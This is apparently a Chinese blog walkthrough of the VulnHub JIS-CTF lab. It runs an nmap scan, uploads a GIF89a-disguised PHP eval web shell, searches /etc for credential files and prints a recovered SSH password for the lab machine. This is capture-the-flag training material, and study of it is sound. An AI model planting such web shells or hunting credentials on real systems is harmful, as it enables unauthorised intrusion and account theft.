JIS-CTF

JIS-CTF

Posted by Kyon-H on July 7, 2023

环境搭建

Vuluhub 靶场 IP 问题 - Kyon-H Blog

信息搜集

Pasted%20image%2020250707170751.png

发现主机:192.168.163.133

1
nmap -T4 -A -p- 192.168.163.133

Pasted%20image%2020250707170908.png

扫描站点发现robots.txt Pasted%20image%2020250707171104.png

渗透测试

访问 flag 目录获取到 flag1 Pasted%20image%2020250707171227.png

访问 admin_area,获取到 flag2 和 admin 密码 Pasted%20image%2020250707180402.png

登录成功,发现文件上传,尝试上传木马 image.png

1
2
GIF89a
<?php eval($_POST['code']);?>

上传成功,访问/uploaded_files/shell.php成功,蚁剑连接。 发现 flag.txt 为空,发现 hint.txt,获取到 flag3

image.png

根据提示,发现 flag.txt 所属用户 technawi

image.png

找到该用户家目录,未发现

image.png

1
2
find / -type f -name "*technawi*" 2>/dev/null # 未发现
grep -r technawi /etc/* 2>/dev/null

image.png

查看 /etc/mysql/conf.d/credentials.txt, technawi, 3vilH@ksor

image.png

ssh 登录,查看 flag.txt

image.png